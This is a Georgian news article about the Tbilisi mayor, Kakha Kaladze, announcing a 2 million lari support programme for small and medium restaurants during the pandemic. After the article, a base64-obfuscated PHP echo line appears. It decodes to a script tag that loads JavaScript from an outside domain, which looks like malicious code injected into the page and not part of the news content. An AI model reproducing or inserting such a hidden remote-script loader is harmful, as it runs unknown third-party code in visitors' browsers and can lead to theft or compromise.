celsiusi
ავერსი საქკაბელი
დედაქალაქის მერმა მცირე და საშუალო ზომის სარესტორნო ბიზნესისთვის ფინანსური მხარდაჭერის პროგრამაზე ისაუბრა, რომელიც თბილისის მერიის ინიციატივით, დღეს ამოქმედდა. ამის შესახებ კალაძემ სოციალურ ქსელში ჩართვისას განაცხადა.
 
მისივე თქმით,  სარესტორნო სექტორის წარმომადგენლებთან კონსულტაციების შედეგად შემუშავებული კრიტერიუმები, რომელსაც ობიექტები ფინანსური მხარდაჭერის მისაღებად უნდა აკმაყოფილებდეს, თბილისის მერიის ოფიციალურ ვებგვერდზეა განთავსებული. 
 
„ცენტრალური ხელისუფლების მხარდაჭერით, მცირე და საშუალო ბიზნესის განვითარების კუთხით, კონკრეტული ნაბიჯი გადავდგით. ეს არის კაფეებისა და რესტორნების მხარდაჭერის პროგრამა, რომელიც დედაქალაქის მასშტაბით განხორციელდება. პანდემიის პირობებში და რთულ ეკონომიკურ ვითარებაში, ზოგადად, ამ მიმართულებას ძალიან გაუჭირდა. ამ ბიზნესების უკან დგანან ადამიანები, ოჯახები, რომელთაც ჩვენი თანადგომა სჭირდებათ. მესმის, რომ ყველა პრობლემის მოსაგვარებლად შესაძლოა, ეს საკმარისი არ იყოს, თუმცა ამ რთული ვითარებიდან გამომდინარე და იმ პირობებში, რომ ვცდილობთ, ყველა მიმართულებას დავეხმაროთ, 2 მლნ ლარი გამოიძებნა, რათა მცირე და საშუალო სარესტორნო ბიზნესის თანადგომა მოხდეს“, - განაცხადა კახა კალაძემ. 
 
კალაძემ საინიციატივო ჯგუფის წარმომადგენლებს, რომლებიც სარესტორნო ბიზნესთან მოლაპარაკებებში იყო ჩართული, მადლობა გადაუხადა და განაცხადა, რომ აღნიშნული პროგრამით ბევრი კომპანია ისარგებლებს. 
 
 
1417
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");